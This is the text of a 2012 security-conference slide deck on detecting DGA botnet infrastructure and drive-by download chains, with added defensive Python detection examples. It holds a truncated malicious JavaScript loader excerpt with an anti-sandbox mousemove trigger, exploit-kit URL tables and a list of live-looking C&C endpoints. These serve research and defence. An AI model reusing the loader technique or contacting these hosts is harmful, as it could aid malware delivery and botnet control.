hitbkl 2012
![Page 1: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/1.jpg)
Messing up with Kids playground: Eradicating easy targets
Yarochkin Fyodor @fygrave, Vladimir Kropotov @vbkropotov
Presented at HITBKL 2012
![Page 2: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/2.jpg)
agenda
● Introduction (cybercrime 2012 – Russian style :)
● Detecting malicious network infrastructure
● Getting one step ahead
● Conclusions
![Page 3: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/3.jpg)
DCCrime-2012: Brief Introduction
● Bots and botnets – still popular :)
● Monetization schemes vary.
● DbD (drive-by download) is one of the most common attack vectors
– We also have email
– We also have stupid users downloading sh*t
– Mobile is a lucrative target (all your money is there)
![Page 4: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/4.jpg)
DCCrime-2012: Introduction
“Traffic” is still an important component in the process :)
![Page 5: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/5.jpg)
Main “components” to deal with
● Callback nodes (aka C&C)
● Traffic:
– Compromised machines/or manipulated content
– Banner networks
– SEO (doorways)
![Page 6: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/6.jpg)
What's new this year?
● Automated detection gets difficult. (anti-sandboxing, anti-crawler tricks)
● In some cases of idiocy, human interaction is a must..
● Mobile phone as the most common means of funds transfer
```javascript
// Excerpt shown on the slide: the loader is wired to document.onmousemove, so it
// only fires after a real mouse movement (the anti-sandboxing trick mentioned above).
function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {
…
```
![Page 7: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/7.jpg)
Mobile scams
● Fake apps are still big
● Android apps avail :)
![Page 8: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/8.jpg)
So really, how easy is it to get pwned in Russia? :)
![Page 9: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/9.jpg)
● So the focus of this research:
– Identifying the “bad kids” playground: mapping infrastructure, identifying potential targets, attempting to fix the problems before “things hit hard”
![Page 10: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/10.jpg)
Detecting malicious network infrastructure
![Page 11: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/11.jpg)
DNS: (did u see this morning's passive DNS talk? ;-))
With the spike of domain-generation botnets, this seems like an interesting research project
DGAs produce a very specific pattern in DNS traffic
![Page 12: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/12.jpg)
Is this the only method to call back?
Nop..
![Page 13: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/13.jpg)
Alternatives...
![Page 14: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/14.jpg)
Domain generative bots
● C&C is not hardcoded, to maintain flexibility in case the C&C is taken down.
● Some sort of algorithm is used to generate domain names
● Domains are tested for validity; an IP address is obtained.
● Sometimes obfuscation is involved (for example, manipulations applied to the resolved IP address)
![Page 15: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/15.jpg)
How it looks on the wire
![Page 16: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/16.jpg)
C&C/generative domains and pattern mining
● DGA-based domains generate very specific, voluminous DNS traffic
● Our research is primarily focused on picking up these patterns. Example: Carberp (details provided by Vladimir Kropotov)
![Page 17: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/17.jpg)
Carberp
● Bot infection: drive-by HTTP
● Payload and intermediate malware domains: normal, recent registration dates, or DynDNS
● Distributed via: many, many compromised web sites; top score > 100 compromised resources detected during 1 week.
● C&C domains usually generated, but some special cases below ;-).
● C&C and malware domains located on the same AS (from the bot's point of view). Easy to detect.
● Typical bot activity: mass HTTP POST
![Page 18: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/18.jpg)
| Domain | URL | Referrer | Payload | Size |
|---|---|---|---|---|
| `beatshine.is-saved.org` | `/g/18418362672595167.js` | `www.*****press.ru` | javascript | 9414 |
| `activatedreplacing.is-very-evil.org` | `/index.php?28d9000e56c2a63080ff89c6f5357591` | `www.*****press.ru` | html | 45443 |
| `activatedreplacing.is-very-evil.org` | `//images/r/785cee8be7f1da9a9d60820cbf8b1840.jar` | | application/x-jar | 4135 |
| `activatedreplacing.is-very-evil.org` | `/server_privileges.php?91370f5f009a815950578cb539f28b58=3` | | application/executable | 155529 |
![Page 19: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/19.jpg)
| Domain | URL | Referrer | Payload | Size |
|---|---|---|---|---|
| `3645455029` | `/1/s.html` | Infected site | html | 997 |
| `Java.com` | `/js/deployJava.js` | `3645455029` | javascript | 4923 |
| `3645455029` | `/1/exp.jar` | | application/x-jar | 18046 |
| `3645455029` | `/file1.dat` | | application/executable | 138352 |
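Both tables show the same shape: a landing page on the infected site, a script, a jar, then an executable from the same host, and the second one hides the host as a bare decimal integer. The following is an added example (not code from the talk) that normalizes such hosts, walks constructed proxy records by referrer, and flags the jar-then-executable sequence; the record values mirror the second table, `infected-site.example` and `cdn.example` are placeholders.

```python
import ipaddress
from dataclasses import dataclass

@dataclass
class Req:
    host: str
    path: str
    referrer: str  # "" when the client sent none (applet and downloader fetches)
    payload: str
    size: int

# Constructed proxy records modelled on the second table above; the numeric host
# is kept exactly as the browser saw it, the infected site is a placeholder.
REQS = [
    Req("3645455029", "/1/s.html", "infected-site.example", "html", 997),
    Req("Java.com", "/js/deployJava.js", "3645455029", "javascript", 4923),
    Req("3645455029", "/1/exp.jar", "", "application/x-jar", 18046),
    Req("3645455029", "/file1.dat", "", "application/executable", 138352),
    Req("cdn.example", "/lib.js", "infected-site.example", "javascript", 300),
]

def normalize_host(host):
    """Browsers accept a bare 32-bit integer as a host ("dword" URL); map it to the
    dotted quad so it matches blocklists and passive-DNS records."""
    if host.isdigit() and int(host) <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(int(host)))
    return host.lower()

def referrer_chain(reqs, infected):
    """Walk the records in order, keeping those reachable from the infected site via
    referrer, plus referrer-less fetches from a host already in the chain."""
    hosts, chain = {infected.lower()}, []
    for r in reqs:
        host = normalize_host(r.host)
        ref = normalize_host(r.referrer) if r.referrer else ""
        if ref in hosts or (not ref and host in hosts):
            hosts.add(host)
            chain.append((host, r.path, r.payload))
    return chain

def exploit_host(chain):
    """Return the host that served a jar and then an executable (the Java exploit
    followed by the dropped payload, as in both tables), or None."""
    served_jar = set()
    for host, _path, payload in chain:
        if payload == "application/x-jar":
            served_jar.add(host)
        elif payload == "application/executable" and host in served_jar:
            return host
    return None
```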
![Page 20: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/20.jpg)
Detection: related works
● Manos Antonakakis, Roberto Perdisci et al. From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware. 2012
● L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. EXPOSURE: Finding malicious domains using passive DNS analysis. In Proceedings of NDSS, 2011
● etc..
![Page 21: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/21.jpg)
What we do differently:
● “lazy” WHOIS lookups, Team Cymru IP-to-ASN lookups
● Our own passive DNS index
● Sandbox farm (mainly to detect compromised websites automagically and study behavior)
![Page 22: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/22.jpg)
Dealing with false positives: filtering
● Generated sequences: n-gram analysis
● WHOIS cross-ref (if available)
● IPs belonging to malicious ASNs
● Public domain lists (Alexa top 100k) work well as a whitelist
![Page 23: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/23.jpg)
Cat and mouse game
● Of course all of this is easy to evade once you know the method. But security is always a 'cat-n-mouse' game ;-)
![Page 24: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/24.jpg)
Architecture
● What we are building ;)
![Page 25: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/25.jpg)
Are we using signatures?
Yes and No..
● We don't have signatures for C&C domains..
● But we maintain patterns for suspicious WHOIS data (registration date, registrar, email, ..)
● Historical DNS and AS association (bad IP)
● Generic patterns for generative domains (high, similarly distributed pattern of failed lookups within the same zone)
![Page 26: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/26.jpg)
A walk through automated detection
● In this example we show how automated detection works step by step, with the redis queries shown as an interactive session:
![Page 27: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/27.jpg)
Detection starting point: rcode 3 (non-existent domains)
![Page 28: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/28.jpg)
Detection: rcode 2 (server failure)
Rcode 2 domains (failed servers)
![Page 29: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/29.jpg)
Sample analysis (step by step)
● Start looking for a failed pattern and cluster id:
![Page 30: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/30.jpg)
Sample analysis (two)
● Get the cluster ID: (eu_11_14)
Clustering is based on domain similarity. Currently used characteristics:
– f(zone, pattern (length, depth))
– additional characteristics (building up): natural-language domain vs. generated string (occurrence of two-character sequences, n-grams)
– domain registration parameters (obtained via WHOIS [problematic!])
– cross-reference with existing malicious IP and AS reputation database (incrementally built by us)
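The pieces above (NXDOMAIN bursts as the starting point, clustering on zone/length/depth, n-gram scoring of the label, and the Alexa-style whitelist from the filtering slide) fit in a short script. This is an added example, not the authors' redis pipeline: the log lines are constructed, the whitelist and bigram table are small stand-ins, and the cluster key only loosely imitates the `eu_11_14` id shown (zone, label length, depth), not the talk's exact scheme.

```python
from collections import defaultdict

# Constructed DNS log lines ("client qname rcode"); rcode 3 = NXDOMAIN. The .eu
# names are the ones the slides list; the rest are stand-ins for background noise.
LOG = """\
10.0.0.5 cihunemyror.eu 3
10.0.0.5 foxivusozuc.eu 3
10.0.0.5 ryqecolijet.eu 3
10.0.0.5 xuqohyxeqak.eu 3
10.0.0.5 jecijyjudew.eu 3
10.0.0.7 avatarmaker.eu 3
10.0.0.9 www.google.com 0
10.0.0.9 typo.example.org 3
"""
WHITELIST = {"google.com", "example.org"}  # stand-in for the Alexa top-100k list
# Thirty frequent English bigrams; generated labels hit few of them.
COMMON = {"th", "he", "in", "er", "an", "re", "on", "at", "en", "nd", "ti", "es",
          "or", "te", "of", "ed", "is", "it", "al", "ar", "st", "to", "nt", "ng",
          "se", "ha", "as", "ou", "io", "le"}

def ngram_score(label):
    """Share of the label's bigrams that are common English bigrams (0 = looks generated)."""
    grams = [label[i:i + 2] for i in range(len(label) - 1)]
    return sum(g in COMMON for g in grams) / len(grams) if grams else 0.0

def labels(qname):
    return qname.lower().rstrip(".").split(".")

def cluster_key(qname):
    """zone_<label length>_<depth>: the f(zone, length, depth) the slide clusters on."""
    parts = labels(qname)
    return f"{parts[-1]}_{len(parts[-2])}_{len(parts)}"

def find_dga_clusters(log, min_size=4):
    """Group NXDOMAIN names by cluster key, drop whitelisted zones, keep big clusters."""
    clusters = defaultdict(set)
    for line in log.splitlines():
        _client, qname, rcode = line.split()
        parts = labels(qname)
        if rcode != "3" or len(parts) < 2 or ".".join(parts[-2:]) in WHITELIST:
            continue
        clusters[cluster_key(qname)].add(qname)
    # Per member, attach the n-gram score so natural-language names (likely false
    # positives such as avatarmaker.eu) stand out for the IP/WHOIS cross-check.
    return {key: {n: ngram_score(labels(n)[-2]) for n in sorted(names)}
            for key, names in clusters.items() if len(names) >= min_size}
```

The score is only a hint: avatarmaker.eu lands in the same cluster because it shares the zone, 11-character label and depth, and it is the IP/WHOIS common-denominator check, not the n-gram score alone, that clears it.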
![Page 31: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/31.jpg)
Sample analysis
● Get other members of the cluster
![Page 32: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/32.jpg)
Sample analysis
● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common-denominator filtering (IP, WHOIS information))
![Page 33: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/33.jpg)
Sample analysis
● So we have C&C IP 66.175.210.173
● We can continue mining to see if we get any other domain names:
![Page 34: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/34.jpg)
Sample analysis
● Look! We just met an old friend!!
![Page 35: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/35.jpg)
Sample analysis
● Palevo:
![Page 36: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/36.jpg)
Mapping C&C (easily automated)
● http://cihunemyror.eu/login.php
● http://foxivusozuc.eu/login.php
● http://ryqecolijet.eu/login.php
● http://xuqohyxeqak.eu/login.php
● http://foqaqehacew.eu/login.php
● http://jecijyjudew.eu/login.php
● http://voworemoziv.eu/login.php
● http://mamixikusah.eu/login.php
● http://qebahilojam.eu/login.php
● http://foqaqehacew.eu/search.php
● http://foqaqehacew.eu/LMvg9Ng1d.php
![Page 37: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/37.jpg)
Sample analysis
● Finding more relevant domains:
![Page 38: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/38.jpg)
Automation
![Page 39: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/39.jpg)
Zoom in...
![Page 40: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/40.jpg)
Performance
● On a single machine (32 GB RAM) we run up to 2000 pkt/sec without significant performance loss
● Average load:
![Page 41: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/41.jpg)
Other Interesting numbers
● Packets per day: ~130M filtered.
● Mal. domains/day: ~30k DNS queries (varies)
● Avg. 30-50 req/minute for a single domain
![Page 42: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/42.jpg)
Uses of the data
● Obvious: blacklists
● Botnet take overs (costs 11USD or less ;)
● Sinkholing
![Page 43: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/43.jpg)
Detection
● (demos, lets look at some videos :)
![Page 44: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/44.jpg)
What could be more flux than fastflux? ;-)
● WHOIS fastflux … HOW?!
```
Domain ID:D166393631-LROR
Domain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORG
Created On:21-Aug-2012 01:23:52 UTC
Last Updated On:21-Aug-2012 01:23:53 UTC
Expiration Date:21-Aug-2013 01:23:52 UTC
Sponsoring Registrar:Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:ID#10760, PO Box 16
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Nobby Beach
Registrant State/Province:
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
```
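The earlier slide says the system keeps patterns for suspicious WHOIS data (registration date, registrar, registrant) rather than signatures for domains. As an added example (not the talk's code), here is a parser for records in the format above plus a few such rules run over a subset of this record; the observation time and the thresholds (7 days, one-year term) are assumptions.

```python
from datetime import datetime, timedelta

# Subset of the record from the slide, one field per line; SEEN_AT is a
# constructed observation time on the registration day.
WHOIS = """\
Domain Name:FOOTBALL-SECURITY-WETRLSGPIEO.ORG
Created On:21-Aug-2012 01:23:52 UTC
Last Updated On:21-Aug-2012 01:23:53 UTC
Expiration Date:21-Aug-2013 01:23:52 UTC
Sponsoring Registrar:Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Country:AU
"""
SEEN_AT = datetime(2012, 8, 21, 12, 0, 0)

def parse_whois(text):
    """Key:value lines; repeated keys (Status) accumulate into a list."""
    fields = {}
    for line in text.splitlines():
        key, sep, val = line.partition(":")
        if sep:
            fields.setdefault(key.strip(), []).append(val.strip())
    return fields

def whois_date(value):
    return datetime.strptime(value.replace(" UTC", ""), "%d-%b-%Y %H:%M:%S")

def whois_flags(fields, seen_at):
    """Pattern rules over the fields the slides name; returns the rule names that fired.
    Thresholds are assumptions, not the talk's values."""
    created = whois_date(fields["Created On"][0])
    expires = whois_date(fields["Expiration Date"][0])
    flags = []
    if seen_at - created < timedelta(days=7):
        flags.append("registered_within_7d")
    if "ADDPERIOD" in fields.get("Status", []):
        flags.append("add_grace_period")  # still inside the registrar's add-grace window
    if any("privacy" in v.lower() for v in fields.get("Registrant Organization", [])):
        flags.append("privacy_protected")
    if expires - created <= timedelta(days=366):
        flags.append("one_year_term")
    return flags
```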
![Page 45: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/45.jpg)
Moving ahead: Finding easy targets before they do :)
![Page 46: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/46.jpg)
In short, it is all about quick ways of finding idiots having no clue of what they are doing with wordpress, oscommerce, openx, [put yer fave], and forcing them to update before they get owned ;)
And hmm.. doing it country-wide
![Page 47: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/47.jpg)
disclaimer
Just another “small data” project we play with. Around a 4-machine Solr cluster.
Largely inspired by “Fruit: why so low?” by Adam MetlStorm (hack.lu 2011)
![Page 48: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/48.jpg)
Scanning the internet is not new.. but pretty much realistic
![Page 49: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/49.jpg)
Architecture
● Network port discovery (agents)
● Banner collection (agents)
● Backend store: SOLR
● Collectibles: services and ports, OS fingerprints, ASN/owner/netblock/country, geographical location, app data
![Page 50: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/50.jpg)
Architecture(2)
● Roughly something like that
![Page 51: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/51.jpg)
Approach
● Scan slow (avoid abuse reports)
● Index time
● Passive “mapper” (simple sniffer + browser fingerprinting at the moment)
● Larger range of ports (account for port numbers which are actively being scanned, from firewall log analysis, honeypot machines etc)
● For web apps – (wafp fingerprinting) + index banner (noisy, cause of most of the abuse complaints)
![Page 52: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/52.jpg)
How you use this shit...
![Page 53: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/53.jpg)
Features
● Scriptable via restful API (think of solr) (cuz UI is for sissies ;-))
● Query by any combination of:
– software version/banner regex (solr/lucene style)
– geospatial search (via geohash)
– ASN or regex on ASN owner
– Country code
![Page 54: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/54.jpg)
Uses
CERT team: automated notification of idiots running old wordpress within a particular range, geographic location or organization is a one-liner script
![Page 55: Hitbkl 2012](https://reader034.vdocuments.us/reader034/viewer/2022042613/54c68f774a7959bc708b4569/html5/thumbnails/55.jpg)
Questions
@fygrave @vbkropotov